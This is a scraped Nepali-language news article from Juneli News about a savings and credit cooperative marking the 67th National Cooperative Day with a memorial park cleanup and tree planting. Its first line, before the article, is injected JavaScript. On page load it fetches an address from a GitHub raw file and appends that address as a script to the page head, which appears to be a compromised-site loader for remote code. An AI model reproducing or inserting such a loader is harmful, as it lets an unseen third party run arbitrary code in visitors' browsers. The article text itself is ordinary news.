;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); अलौकिक सपनावती सहकारीले मनायो ६७ औँ राष्ट्रिय सहकारी दिवस – जुनेली न्युज
सोमवार, बैशाख २, २०८२
  • होमपेज
  • अलौकिक सपनावती सहकारीले मनायो ६७ औँ राष्ट्रिय सहकारी दिवस
Breaking News

अलौकिक सपनावती सहकारीले मनायो ६७ औँ राष्ट्रिय सहकारी दिवस

जुनेली न्यूज, काठमाडौं

सहकारीमा सुशासन : प्रविधि र एकीकरणकाे मुल नाराकाे साथमा ६७ औं राष्ट्रिय सहकारी दिवसकाे अवसरमा अलौकिक सपनावती बचत तथा ऋण सहकारी संस्था लिमिटेडले भव्य रूपमा सहकारी दिवस मनाएको छ।

संचालक समिति,उपसमिति तथा कर्मचारीहरू समेतकाे सहभागितामा सामाजिक उत्तरदायित्य कार्यक्रम अन्तरगत स्थानिय माहाङ्काल-०६ मा स्थित ज्ञात अज्ञात सहिद स्मृति उद्धान सरसफाई कार्यक्रम आयोजना गरेको छ ।

सबल समाज,उद्धानका पदधिकारी,जागरुक युवा समाज तथा स्थानिय ब्यक्तित्वहरूकाे विशेष सहयाेग रहेकाे उक्त कार्यक्रममा पार्क लगायत क्षेत्रमा सरसफाई गरिएको र २५ बाेरा फाेहाेर संकलन गरि स्मृतीकाे रूपमा धुपिकाे बिरुवा राेपिएको कार्यालयका प्रशासकिय अधिकृत रजुन सिग्देल ले जानकारी दिए।

यसै गरि अन्य सहकारीहरु ले पनि देश भर विभिन्न कार्यक्रम आयोजना गरि राष्ट्रिय सहकारी दिवस भव्य रुपमा सप्पन्न गरे।

फेसबुक प्रतिक्रियाहरु